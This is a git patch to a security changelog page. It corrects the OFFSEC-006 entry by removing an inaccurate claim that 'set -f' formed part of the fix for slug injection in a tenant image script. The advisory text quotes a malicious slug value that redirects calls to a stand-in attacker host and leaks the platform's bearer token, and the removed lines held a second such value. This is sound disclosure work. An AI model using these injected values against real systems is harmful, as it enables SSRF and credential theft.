From 1446879fe7342003a845af6627fa0b54dec40b69 Mon Sep 17 00:00:00 2001 From: Molecule AI App & Docs Lead Date: Sat, 16 May 2026 13:28:14 +0000 Subject: [PATCH] fix(security-changelog): remove inaccurate set -f clause from OFFSEC-006 entry MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The validate_slug() RFC-1123 regex is the sole remediation. The set -f "two-layer defence" description was inaccurate — set -f is not present in promote-tenant-image.sh on main. Corrects per technical-writer review guidance on docs#51. Co-Authored-By: Claude Opus 4.7 --- content/docs/security/changelog.md | 7 +------ 1 file changed, 1 insertion(+), 6 deletions(-) diff --git a/content/docs/security/changelog.md b/content/docs/security/changelog.md index 38fe2f5..1c0ba46 100644 --- a/content/docs/security/changelog.md +++ b/content/docs/security/changelog.md @@ -20,14 +20,9 @@ This page documents security fixes shipped in the Molecule AI platform. Each ent `promote-tenant-image.sh` interpolated tenant slugs directly into URL paths and ECR repository identifiers without validation. A malicious slug such as `?url=https://attacker.com&token=$CP_TOKEN` could cause the platform to redirect HTTP calls to an attacker-controlled host (SSRF) and expose the platform's bearer token in the attacker's server access logs via the same URL parameter injection. -Bash glob metacharacters (`*`, `?`, `[`) in slug values were subject to pathname expansion before being passed to curl, adding a secondary injection vector: a slug like `evil?url=https://attacker.com` would expand to a list of filenames before being interpolated into the URL. - ### Fix -Two-layer defence applied to `promote-tenant-image.sh`: - -1. **`set -f`** (script top): disables glob expansion, so `*`, `?`, and `[` are treated as literal characters. -2. **`validate_slug()`**: new function using RFC-1123 regex (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Invalid slugs are rejected with exit code 64 before any network call is issued. Additionally, `validate_tenants()` is called after argument parsing and exits 64 on any tenant with an invalid slug. +New `validate_slug()` function using RFC-1123 regex (`^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$`). Invalid slugs are rejected with exit code 64 before any network call is issued. Additionally, `validate_tenants()` is called after argument parsing and exits 64 on any tenant with an invalid slug. ### User-facing summary